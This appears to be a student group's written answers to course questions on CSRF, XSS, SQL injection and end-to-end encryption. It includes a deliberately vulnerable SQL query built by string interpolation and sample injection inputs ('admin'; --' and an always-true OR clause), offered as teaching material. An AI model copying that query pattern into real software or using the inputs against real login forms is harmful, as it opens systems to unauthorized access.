- What is a CSRF attack? How does it use HTTP requests? And why do we call it the one-click attack?
- What is an XSS attack? And what is the connection between it and cookies/sessions? And what are the two main categories of XSS?
- What is SQL injection? and what is the attacker’s intention from it?
- Consider the below SQL command, where is the vulnerability? think about some ways an attacker can misuse it:
const { username, password } = req.body
let strQry = `SELECT Count(*) FROM Users WHERE username=${username} AND password=${password}`;
- What does End-to-End encryption means? Share an example of an well-known app using E2EE, how is that app using it?
Room 11 : Dana Maraqa, Musab Sakhreyah, Aya Abu Al Hummos, Sanad Al Shobaki,
Q1:
Cross-Site Request Forgery (CSRF) is an attack that forces authenticated users to submit a request to a Web application against which they are currently authenticated.CSRF attacks exploit the trust a Web application has in an authenticated user. by using HTTP requests to deceive the victim's browser into sending forged request to a target site where the victim is authenticated.
it is called one-click attack because it usually takes one click on a malicious link or a visit to a malicious website for the attack to initiate.
Q2:
An XSS (Cross-Site Scripting) attack occurs when an attacker injects malicious scripts into content from a trusted website, which then gets executed in the victim's browser.The connection between XSS and cookies/sessions is that attackers often use XSS to steal session cookies or tokens. By injecting scripts that send the user's cookies to the attacker, they can hijack the user's session and impersonate them.
XSS Categories : Stored (persistent): The malicious script is permanently stored on the target server
Reflected(Non-persistent):The malicious script is included in a request sent to the server,and the server includes it in the response.
Q3:
Q4-
The SQL command is vulnerable to SQL injection because it directly includes user-provided data (username and password) in the SQL query. An attacker could provide a specially crafted username or password that alters the SQL command. For example, if an attacker provides "admin'; --" as the username, the SQL command becomes SELECT Count(*) FROM Users WHERE username='admin'; -- AND password=${password}, which could allow unauthorized access if 'admin' is a valid username.
or SQL injection can be implemented to change the code from mentioned above to SELECT Count(*) FROM Users WHERE username='' OR '1'='1'; which will always evaluate to true so the authentication for the username and password will always return the data .
Q5-
End-to-End Encryption (E2EE): E2EE is a method of secure communication that prevents third-parties from accessing data while it's transferred from one end system or device to another. A well-known app that uses E2EE is WhatsApp. WhatsApp uses the Signal Protocol to implement end-to-end encryption. When you send a message, it is secured with a lock, and only the recipient has the special key to unlock and read the message.